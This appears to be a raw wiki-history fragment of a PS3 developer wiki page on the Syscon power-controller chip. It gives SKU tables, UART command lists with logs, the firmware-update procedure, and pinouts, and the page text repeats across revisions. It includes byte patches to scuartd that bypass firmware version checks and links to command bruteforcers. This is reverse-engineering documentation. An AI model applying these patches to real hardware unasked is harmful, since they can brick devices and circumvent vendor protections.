/> |-<br /> | [[CECHAxx]]&lt;br /&gt;[[CECHBxx]] || 0x01&lt;br /&gt;0x02 || [[COK-00x#COK-001|COK-001]] || [[CXR713120-201GB]] || 0B8E || <br /> |-<br /> | [[CECHCxx]]&lt;br /&gt;[[CECHExx]] || 0x03&lt;br /&gt;0x04 || [[COK-00x#COK-002|COK-002]] or&lt;br /&gt;[[COK-00x#COK-002W|COK-002W]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] || 0C16 || <br /> |-<br /> | [[CECHGxx]] || 0x05 || [[SEM-00x|SEM-001]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] or&lt;br /&gt;[[CXR713120-203GB]] || 0D52 ||<br /> |-<br /> | [[CECHHxx]] || 0x06 || [[DIA-00x#DIA-001|DIA-001]] || [[CXR714120-301GB]] || 0DBF ||<br /> |-<br /> | [[CECHJxx]]&lt;br /&gt;[[CECHKxx]] || 0x07 || [[DIA-00x#DIA-002|DIA-002]] || [[CXR714120-301GB]] or&lt;br /&gt;[[CXR714120-302GB]] || 0E69 || <br /> |-<br /> | [[CECHLxx]]&lt;br /&gt;[[CECHMxx]]&lt;br /&gt;[[CECHPxx]]&lt;br /&gt;[[CECHQxx]] || 0x08 || [[VER-00x|VER-001]] || [[SW-301]] or&lt;br /&gt;[[SW-302]] || 065D ||<br /> |-<br /> | [[CECH-20xx]] || 0x09 || [[DYN-00x|DYN-001]] || [[SW2-301]] || 0832 || <br /> |-<br /> | [[CECH-21xx]] || 0x0A || [[SUR-00x|SUR-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] || 08A0 || <br /> |-<br /> | [[CECH-25xx]] || 0x0B || [[JTP-00x|JTP-001]] or&lt;br /&gt;[[JSD-00x|JSD-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]]&amp;nbsp;&amp;nbsp;or&lt;br /&gt;[[SW2-303]] || 08C2 || <br /> |-<br /> | [[CECH-30xx]] || 0x0C || [[KTE-00x|KTE-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] or&lt;br /&gt;[[SW2-303]] || 0918 || <br /> |-<br /> | [[CECH-40xx]] || 0x0D || [[MSX-00x|MSX-001]] or&lt;br /&gt;[[MPX-00x|MPX-001]] || [[SW3-302]] || 098F || <br /> |-<br /> |}<br /> <br /> ==Non retail==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Active JTAG !! Notes<br /> |-<br /> | [[CEB-2040]] || - || [[MPU-501]] || [[CXR713F120|CXR713F120GB-000]] || || Yes || Retail prototype<br /> |-<br /> | [[DECR-1000|DECR1000(A/J)]] || 0x01 || [[TMU-520]] || [[CXR713F120A]] || 03FB || Yes || Reference tool<br /> |-<br /> | [[DEH-H1000A(S)(-E(S))]] || 0x01 || [[COK-001 (Prototype)]] || [[CXR713F120A]] || 0B67 || Yes || Preproduction<br /> |-<br /> | [[DEH-H1001-D]] || 0x01 || [[COOKIE-13]] || [[CXR713F120A]] || ?0B67? || Yes || Preproduction<br /> |-<br /> | [[DEH-FH1500J-A]] || || [[VERTIGO-02]] || || || || Preproduction<br /> |-<br /> &lt;!-- Not Prototype debug units - see retail --&gt;<br /> |}<br /> &lt;br/&gt;<br /> ----<br /> <br /> Not mentioned:&lt;pre&gt;<br /> 0F29 - ?<br /> 0F38 - ?&lt;/pre&gt;<br /> <br /> = Syscon Externalised Ports =<br /> '''Note:''' for more specific information per model, see the links to each subppage in the Serialnumbers @ SKU table.<br /> <br /> == Syscon UART packets ==<br /> <br /> === SCUART daemon (SCUARTD) packet structure ===<br /> <br /> SCUARTD packets includes header of 0x3 bytes and optional payload (depending on the command).<br /> Packet IDs are not important, they are used only by clients and processed by SCUART daemon. SCUART daemon opens terminal file /dev/ttyS0 and use it to send commands and receive responses.<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Size !! Description<br /> |-<br /> | 0x00 || 0x01 || Magic?<br /> |-<br /> | 0x01 || 0x01 || Payload size<br /> |-<br /> | 0x02 || 0x01 || Command<br /> |-<br /> | 0x03 || Payload size || Payload data<br /> |-<br /> |}<br /> <br /> === Packets ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Description !! Notes<br /> |-<br /> | 0x00 || '''version''' || Firmware version || Gets installed syscon's firmware version (Note: backup bank contains version 0.4.5_b4 !! On CEB-2030 it is 0.3.0 )<br /> |-<br /> | 0x01 || '''bringup''' || || &lt;!--// Standby-&gt;ON (Remote Power ON using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x02 || '''shutdown''' || || &lt;!--// ON-&gt;Standby (Remote Power OFF using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x03 || '''firmud''' || Firmware update || Notifies about firmware update operation<br /> |-<br /> | 0x04 || '''bsn''' || Board Serial Number || Retrieves syscon's Board Serial Number<br /> |-<br /> | 0x05 || '''halt''' || || Used at start of firmware update operation<br /> |-<br /> | 0x06 || '''cp ready''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x07 || '''cp busy''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x08 || '''cp reset''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x09 || '''bestat''' || Cell B.E. status || Retrieves Cell B.E. status<br /> |-<br /> | 0x0A || '''powersw''' || &lt;!-- Power switch ? --&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;!-- Reset switch ? --&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || ||<br /> |-<br /> | 0x0D || '''bootbeep on''' || ||<br /> |-<br /> | 0x0E || '''bootbeep off''' || ||<br /> |-<br /> | 0x0F || ''Reset syscon'' || Reset || Resets syscon<br /> |-<br /> | 0x10 || '''xdrdiag info''' || XDR diagnostics ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || XDR diagnostics || Starts XDR diagnostics<br /> |-<br /> | 0x12 || '''xdrdiag result''' || XDR diagnostics || Gets a result of XDR diagnostics<br /> |-<br /> | 0x13 || '''xiodiag''' || XIO diagnostics || Starts XIO diagnostics and gets a result of it<br /> |-<br /> | 0x14 || '''fandiag''' || Fan diagnostics || Retrieves RPMs of fans<br /> |-<br /> | 0x15 || '''errlog''' || Error log || Retrieves a list of codes (with timestamps) of latest errors<br /> |-<br /> | 0x16 || ''Read line'' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || Reference Tool's temperature || Gets the temperature of reference tool<br /> |-<br /> | 0x18 || rowspan=&quot;7&quot; colspan=&quot;3&quot; style=&quot;background:lightgrey; color:#ff0000; text-align: center;&quot; | Invalid CMDs<br /> |-<br /> | 0x19<br /> |-<br /> | 0x1A<br /> |-<br /> | 0x1B<br /> |-<br /> | 0x1C<br /> |-<br /> | 0x1E<br /> |-<br /> | 0x1F<br /> |-<br /> | 0x20 || '''cp beepremote''' || ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || ||<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || ||<br /> |-<br /> | ?? || '''csum''' || Checksum ?? || Calculates the Checksum of something (No packet ID listing on scuartd)<br /> |-<br /> | ?? || '''osbo''' || ??? || No idea what this does, but returns &lt;pre&gt;done&lt;/pre&gt; when it's sent &lt;!--Operative System Boot Order ?... something related with gameOS/otherOS boot flag ? --&gt;<br /> |-<br /> | ?? || '''scopen''' || returns SC_READY or ERROR 1 || ???<br /> |-<br /> | ?? || '''scclose''' || || ???<br /> |-<br /> |}<br /> <br /> === Packets Logs ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Logs !! Notes<br /> |-<br /> | 0x00 || '''version''' || &lt;pre&gt; version\nv1.0.4_c2\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x01 || '''bringup''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x02 || '''shutdown''' || &lt;pre&gt; Do nothing. (PowerOff State)\n (END) &lt;/pre&gt; || Returns (END) if the system is on <br /> |-<br /> | 0x03 || '''firmud''' || &lt;pre&gt; Start...\nErase User Program Area\n (END) &lt;/pre&gt; || This will brick your SYSCON if you don't feed it any argument or feed to it the wrong argument!<br /> |-<br /> | 0x04 || '''bsn''' || &lt;pre&gt; bsn\nNANNNNNNNNNA\n (END) &lt;/pre&gt; || N is digit and A is char (removed for privacy)<br /> |-<br /> | 0x05 || '''halt''' || &lt;pre&gt; halt\n (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x06 || '''cp ready''' || &lt;pre&gt; cp ready\nCP READY: OK\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x07 || '''cp busy''' || &lt;pre&gt; cp ready\nCP BUSY: OK\n (END) &lt;/pre&gt; || STATUS light blinks forever<br /> |-<br /> | 0x08 || '''cp reset''' || No response || Should reset CP to factory settings<br /> |-<br /> | 0x09 || '''bestat''' || &lt;pre&gt; (PowerOff State)\n (END) &lt;/pre&gt;||<br /> |-<br /> | 0x0A || '''powersw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || &lt;pre&gt; BOOT BEEP: ON\n (END) &lt;/pre&gt; || when it's off BOOT BEEP status changes to OFF<br /> |-<br /> | 0x0D || '''bootbeep on''' || &lt;pre&gt; BOOT BEEP ON: DONE\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x0E || '''bootbeep off''' || &lt;pre&gt; BOOT BEEP OFF: DONE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0F || '''Reset syscon''' || ||<br /> |-<br /> | 0x10 || '''xdrdiag info''' || &lt;pre&gt; 32\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || &lt;pre&gt; DIAG START\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x12 || '''xdrdiag result''' || &lt;pre&gt; XDR OK\n (END) &lt;/pre&gt; || will return ERROR NOT STARTED if xdrdiag start wasn't run previously<br /> |-<br /> | 0x13 || '''xiodiag''' || &lt;pre&gt; 0 903\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x14 || '''fandiag''' || &lt;pre&gt; ERROR FAN ACTIVE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x15 || '''errlog''' || &lt;pre&gt; ofst[ %d]:err_code:0x%08X, clock:0x%08X YYYY/MM/DD HH:MM:SS &lt;/pre&gt; || bunch of error logs. ends with (END) once they're over<br /> |-<br /> | 0x16 || '''Read line''' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || <br /> |-<br /> | 0x20 || '''cp beepremote''' || &lt;pre&gt; (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends a beep different than SYSCON beep :)<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends two beeps different than SYSCON beeps :)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027460C9] [68269779] [C19A855E]\n (END)&lt;/pre&gt; || displays 3 hexadecimal numbers inside rect parenthesis. the numbers are always the same, except when syscon version changes (v1.0.5_c1) <br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02746F91] [682F04DA] [27688CF5]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c2)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [0274C877] [684DA659] [EA426BB1]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027B4064] [6B450C64] [4FBF6DA3]\n (END)&lt;/pre&gt; || Another response (v1.0.3_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027E1B71] [6CDA9F25] [E0C67065]\n (END)&lt;/pre&gt; || Another response (v1.0.1_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02812855] [6E83917C] [D40F70A5]\n (END)&lt;/pre&gt; || Another response (v0.9.14_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02835059] [6FC5C632] [BB9BBEC3]\n (END)&lt;/pre&gt; || Another response (v0.9.9_c1)<br /> |-<br /> | ?? || '''osbo''' || &lt;pre&gt;done\n (END)&lt;/pre&gt; ||<br /> |-<br /> |}<br /> <br /> === Notes ===<br /> <br /> * Some commands are unavailable on earlier firmwares, for example, tmpforcp is only supported on 1.3.3+.<br /> * Some commands are divided into several strings, the first part (if exists) describes a command group, the second part describes the actual command and other parts describes command arguments.<br /> * Real syscon commands have an ASCII form (a bold text in the 2nd column) instead of bytes above.<br /> * Packet with ID *0x03* notifies syscon and calls SX program (based on ZMODEM protocol) to send firmware, syscon have custom or original implementation of RX program to receive firmware. An implementation of ZMODEM protocol used by Sony: http://oss.sony.net/Products/Linux/Others/Download/DECR-1000/mips_fp_le-lrzsz-0.12.20-devtool.1.src.rpm<br /> <br /> A start of syscon's update procedure:<br /> * A CP development tool includes several scripts which are participated in syscon update procedure. It starts after a CP update via ''update_syscon.pl'' perl script.<br /> * This script checks the current syscon's firmware version. If it is in mask rom then it skips an update procedure, if not it checks major/minor/release parts of both versions and if a new version is applicable then it launches ''scfirmup'' utility and pass the firmware file path as an argument.<br /> * ''scfirmup'' is a stupid tool which prepares a connection to SCUARTD and sends an update packet with a file path inside it. There is no need to comment it, here is reimplementation: http://pastie.org/private/6h8mfeoics4mdxear7ayg<br /> <br /> A syscon's update operation in '''SCUARTD''' consists of following steps:<br /> * 1. Check if ''SX'' program presents in ''/usr/bin/sx''. It should be a regular file.<br /> * 2. Check if specified firmware file is a regular file.<br /> * 3. Halt syscon by sending command '''halt''' to UART, then wait some time until it prints ''HALT: OK''.<br /> * 4. Reset syscon by sending byte ''0x30'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> * 5. Get current syscon's firmwave version by sending command '''version''' to UART. After receiving it, look for a character after the first ''_'' (underscore) symbol from the left side of string and if it equals to the character ''b'', then proceed to the next step, otherwise go to the (8) step. (It is possible to patch this step to allow upgrading or downgrading at will)<br /> * 6. Prepare syscon for an update by sending command '''firmud''' to UART, then fork the current process; the current process won't finish until a message ''Done'' from UART arrives (it is the end of update operation).<br /> * 7. In the forked process start ''SX'' program and pass firmware file path to it. ''SX'' program reads firmware file and transfer each chunk of it to syscon.<br /> * 8. After successful update operation reset syscon (a different way) by sending byte ''0x31'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> <br /> Notes:<br /> * It seems all scuartds checks firmware revision and probably syscon is updated only once (after factory).<br /> * To be able to reflash it you need to patch ''SCUARTD'' or do a manual update without the use of ''SCUARTD''.<br /> * You need to patch a single byte in ''SCUARTD'' to be able to flash any firmware (for example, to downgrade your syscon).<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:00403A94: /* scuartd from CP 1.3.3 */<br /> lb $v1, 1($v0)<br /> li $v0, &quot;b&quot; /* 62 00 02 24 -&gt; 63 00 02 24 */<br /> bne $v1, $v0, loc_4039F4<br /> move $a0, $zero<br /> &lt;/syntaxhighlight&gt;<br /> * An actual firmware update process (without halting and resetting steps) takes about 1 minute.<br /> * You cannot install a corrupted firmware with scfirmup unless you corrupt the header! It seems there is a hash of sorts (possibly of the plaintext) in the header preventing scfirmup from installing something corrupt<br /> * Updating SYSCON requires the DECR to be in standby mode! You cannot update it while it is on.<br /> * Corrupting the header and the body will make firmup install the SYSCON update anyways! be careful not to do it!<br /> * Should you brick SYSCON, here's a patch to &quot;unbrick&quot; it, do not use it unless you brick it though!<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:004038C0:<br /> lw $a0, 4($s4)<br /> li $a1, 0x400000<br /> nop<br /> addiu $a1, (aHalt - 0x400000) # &quot;halt&quot;<br /> la $t9, scuartd_send_sccmd<br /> nop<br /> jalr $t9 ; scuartd_send_sccmd<br /> nop<br /> lw $gp, 0x1E8+var_1D8($sp)<br /> bnez $v0, loc_4039B4 /* 33 00 40 14 -&gt; 33 00 40 10 */<br /> li $a0, 1<br /> &lt;/syntaxhighlight&gt;<br /> <br /> * You can use this bruteforcer to try your luck when finding new packets : https://hastebin.com/vomogesaru.cpp<br /> <br /> == Syscon UART ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | P16 || UART0_TxD || Serial Transmit<br /> |-<br /> | P15 || UART0_RxD || Serial Receive<br /> |-<br /> |}<br /> <br /> You can attach a 3.3v TTL cable (LV-TTL) to the UART on syscon (UART0_TxD, UART0_RxD). (Convenient solder points are available on JSD/JTP-001 by the NOR test points. They are marked as '?' in [[:File:JSD-001 NOR - nor testpoints.png|marcan' noraliser / judges' NORway install picture]], closest to the ground at the bottom - RX is left, TX is right) Baud rate is 57600. There is a simple plaintext protocol involved. This varies on different syscon models. Example:<br /> <br /> '''&lt;command&gt;:&lt;hash&gt;'''<br /> <br /> Where the hash is the sum of command bytes &amp; 0xFF<br /> <br /> you should terminate commands with \r\n, the syscon messages are only terminated with \n<br /> <br /> === Samples ===<br /> Here are some of the commands/messages encountered:<br /> <br /> Messages:<br /> &lt;pre&gt;Power applied (standby mode)<br /> OK 00000000:3A<br /> <br /> Power on<br /> # (PowerOn State):7F<br /> <br /> Power off (Hard shutdown)<br /> # (PowerOff State):DD<br /> <br /> After Fan test:<br /> # (PowerOff State) (Fatal):36<br /> <br /> No text, invalid hash:<br /> NG F0000002:4D&lt;/pre&gt;<br /> <br /> Commands:<br /> &lt;pre&gt;VER:ED<br /> OK 00000000 S1E 00 00 065D:A4<br /> <br /> ERRLOG:CB<br /> OK 00000000:3A<br /> <br /> DATE:1E<br /> NG F0000003:4E<br /> <br /> C:F1:BUZ<br /> E:4F:NG F0000004<br /> <br /> C:D0:CID<br /> E:50:NG F0000005<br /> <br /> C:DA:EEP<br /> E:50:NG F0000005<br /> <br /> C:D5:FAN<br /> E:50:NG F0000005<br /> <br /> C:F4:KSV<br /> E:50:NG F0000005<br /> <br /> C:ED:REV<br /> E:50:NG F0000005<br /> <br /> C:F8:SPU<br /> E:50:NG F0000005&lt;/pre&gt;<br /> more [[Talk:System_Controller_Firmware#Syscon_commands|Syscon commands]]<br /> <br /> bruteforcing commands:&lt;!--// LOL //--&gt; http://pastebin.com/CNei0xbC&lt;br&gt;<br /> <br /> VERY IMPORTANT:<br /> * Max size of a command is 11 characters,16 if you count with C:&lt;hash&gt;:<br /> * Sending a command with 11 chars results in NO OUTPUT<br /> * Sending a command with more than 11 chars results in NG F0000002<br /> * Max size of a command on DECR is 135, 140 if you count with C:&lt;hash&gt;:<br /> <br /> == Syscon (SPI) EEPROM ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | F16 || CSB || Chip Select (needs to be low)<br /> |-<br /> | H16 || DO || Serial Data Output<br /> |-<br /> | G16 || DI || Serial Data Input<br /> |-<br /> | E16 || SKB || Serial Data Clock<br /> |-<br /> | J15 || WCB || Write Protect<br /> |-<br /> | J16 || RBB || Ready/Busy<br /> |-<br /> | G11 || VDDep || + 3.3V<br /> |-<br /> | C15 || VSSep || GND<br /> |-<br /> |}<br /> <br /> == Syscon JTAG ==<br /> disabled in factory after production on retailmodels<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | L8 || JRTCK || Return Test Clock<br /> |-<br /> | K8 || JTCK || Test Clock<br /> |-<br /> | K9 || JTDO || Test Data Out<br /> |-<br /> | L9 || JTMS || Test Mode State / Test Mode Select<br /> |-<br /> | K7 || JTDI || Test Data In<br /> |-<br /> | L7 || JNTRST || Test Reset<br /> |-<br /> |}<br /> <br /> = Syscon Underlaying ports =<br /> == Syscon Cell SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | M2 || /BE_SPI_CS || Chip Select<br /> |-<br /> | N2 || BE_SPI_DO || Serial Data Output<br /> |-<br /> | M1 || BE_SPI_DI || Serial Data Input<br /> |-<br /> | N1 || BE_SPI_CLK || Serial Data Clock<br /> |-<br /> | P2 || /BE_RESET || CellBE Reset<br /> |-<br /> | P1 || BE_POWGOOD || CellBE PowerGood<br /> |-<br /> | T2 || /BE_INT || CellBE Interrupt<br /> |-<br /> |}<br /> <br /> == Syscon Southbridge SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | B9 || /SB_SPI_CS || Chip Select<br /> |-<br /> | B8 || SB_SPI_DO || Serial Data Output<br /> |-<br /> | A9 || SB_SPI_DI || Serial Data Input<br /> |-<br /> | A8 || SB_SPI_CLK || Serial Data Clock<br /> |-<br /> |}<br /> <br /> &lt;!--// Remote Power ON/OFF (from network, HDMI CEC commands, etc...) is managed by devices connected to the southbridge (ethernet/wifi/BT, HDMI controller, etc...) //--&gt;<br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Syscon_Hardware&diff=44688 Syscon Hardware 2017-07-07T13:27:38Z <p>Mathieulh: assumed a typo when there isn't one</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SYSCON_GEN1.JPG|thumb|Syscon 1st Generation (BGA Packaging)]]&lt;br /&gt;[[File:Pyramid Syscon live probing.jpg|thumb|Pyramid Syscon live probing]]&lt;/div&gt;<br /> <br /> Syscon is the main power controller chip. It is responsible for powering up the various power systems and for configuring and initialising the [[CELL BE]], [[RSX]] and [[South Bridge]]. It communicates with these devices via seperate SPI busses. There is external access by JTAG (disabled from factory on retail models), an EEPROM programming interface &lt;!-- not fully examined --&gt; and Serial (UART). The Syscon is a SoC and consists of an ARM7TDMI (ARMv4) CPU, a 256KB EEPROM and 16KB RAM.<br /> <br /> = Serialnumbers @ SKU =<br /> <br /> == Retail ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Notes<br /> |-<br /> | [[CECHAxx]]&lt;br /&gt;[[CECHBxx]] || 0x01&lt;br /&gt;0x02 || [[COK-00x#COK-001|COK-001]] || [[CXR713120-201GB]] || 0B8E || <br /> |-<br /> | [[CECHCxx]]&lt;br /&gt;[[CECHExx]] || 0x03&lt;br /&gt;0x04 || [[COK-00x#COK-002|COK-002]] or&lt;br /&gt;[[COK-00x#COK-002W|COK-002W]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] || 0C16 || <br /> |-<br /> | [[CECHGxx]] || 0x05 || [[SEM-00x|SEM-001]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] or&lt;br /&gt;[[CXR713120-203GB]] || 0D52 ||<br /> |-<br /> | [[CECHHxx]] || 0x06 || [[DIA-00x#DIA-001|DIA-001]] || [[CXR714120-301GB]] || 0DBF ||<br /> |-<br /> | [[CECHJxx]]&lt;br /&gt;[[CECHKxx]] || 0x07 || [[DIA-00x#DIA-002|DIA-002]] || [[CXR714120-301GB]] or&lt;br /&gt;[[CXR714120-302GB]] || 0E69 || <br /> |-<br /> | [[CECHLxx]]&lt;br /&gt;[[CECHMxx]]&lt;br /&gt;[[CECHPxx]]&lt;br /&gt;[[CECHQxx]] || 0x08 || [[VER-00x|VER-001]] || [[SW-301]] or&lt;br /&gt;[[SW-302]] || 065D ||<br /> |-<br /> | [[CECH-20xx]] || 0x09 || [[DYN-00x|DYN-001]] || [[SW2-301]] || 0832 || <br /> |-<br /> | [[CECH-21xx]] || 0x0A || [[SUR-00x|SUR-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] || 08A0 || <br /> |-<br /> | [[CECH-25xx]] || 0x0B || [[JTP-00x|JTP-001]] or&lt;br /&gt;[[JSD-00x|JSD-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]]&amp;nbsp;&amp;nbsp;or&lt;br /&gt;[[SW2-303]] || 08C2 || <br /> |-<br /> | [[CECH-30xx]] || 0x0C || [[KTE-00x|KTE-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] or&lt;br /&gt;[[SW2-303]] || 0918 || <br /> |-<br /> | [[CECH-40xx]] || 0x0D || [[MSX-00x|MSX-001]] or&lt;br /&gt;[[MPX-00x|MPX-001]] || [[SW3-302]] || 098F || <br /> |-<br /> |}<br /> <br /> ==Non retail==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Active JTAG !! Notes<br /> |-<br /> | [[CEB-2040]] || - || [[MPU-501]] || [[CXR713F120|CXR713F120GB-000]] || || Yes || Retail prototype<br /> |-<br /> | [[DECR-1000|DECR1000(A/J)]] || 0x01 || [[TMU-520]] || [[CXR713F120A]] || 03FB || Yes || Reference tool<br /> |-<br /> | [[DEH-H1000A(S)(-E(S))]] || 0x01 || [[COK-001 (Prototype)]] || [[CXR713F120A]] || 0B67 || Yes || Preproduction<br /> |-<br /> | [[DEH-H1001-D]] || 0x01 || [[COOKIE-13]] || [[CXR713F120A]] || ?0B67? || Yes || Preproduction<br /> |-<br /> | [[DEH-FH1500J-A]] || || [[VERTIGO-02]] || || || || Preproduction<br /> |-<br /> &lt;!-- Not Prototype debug units - see retail --&gt;<br /> |}<br /> &lt;br/&gt;<br /> ----<br /> <br /> Not mentioned:&lt;pre&gt;<br /> 0F29 - ?<br /> 0F38 - ?&lt;/pre&gt;<br /> <br /> = Syscon Externalised Ports =<br /> '''Note:''' for more specific information per model, see the links to each subppage in the Serialnumbers @ SKU table.<br /> <br /> == Syscon UART packets ==<br /> <br /> === SCUART daemon (SCUARTD) packet structure ===<br /> <br /> SCUARTD packets includes header of 0x3 bytes and optional payload (depending on the command).<br /> Packet IDs are not important, they are used only by clients and processed by SCUART daemon. SCUART daemon opens terminal file /dev/ttyS0 and use it to send commands and receive responses.<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Size !! Description<br /> |-<br /> | 0x00 || 0x01 || Magic?<br /> |-<br /> | 0x01 || 0x01 || Payload size<br /> |-<br /> | 0x02 || 0x01 || Command<br /> |-<br /> | 0x03 || Payload size || Payload data<br /> |-<br /> |}<br /> <br /> === Packets ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Description !! Notes<br /> |-<br /> | 0x00 || '''version''' || Firmware version || Gets installed syscon's firmware version (Note: backup bank contains version 0.4.5_b4 !! On CEB-2030 it is 0.3.0 )<br /> |-<br /> | 0x01 || '''bringup''' || || &lt;!--// Standby-&gt;ON (Remote Power ON using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x02 || '''shutdown''' || || &lt;!--// ON-&gt;Standby (Remote Power OFF using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x03 || '''firmud''' || Firmware update || Notifies about firmware update operation<br /> |-<br /> | 0x04 || '''bsn''' || Board Serial Number || Retrieves syscon's Board Serial Number<br /> |-<br /> | 0x05 || '''halt''' || || Used at start of firmware update operation<br /> |-<br /> | 0x06 || '''cp ready''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x07 || '''cp busy''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x08 || '''cp reset''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x09 || '''bestat''' || Cell B.E. status || Retrieves Cell B.E. status<br /> |-<br /> | 0x0A || '''powersw''' || &lt;!-- Power switch ? --&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;!-- Reset switch ? --&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || ||<br /> |-<br /> | 0x0D || '''bootbeep on''' || ||<br /> |-<br /> | 0x0E || '''bootbeep off''' || ||<br /> |-<br /> | 0x0F || ''Reset syscon'' || Reset || Resets syscon<br /> |-<br /> | 0x10 || '''xdrdiag info''' || XDR diagnostics ||<br /> 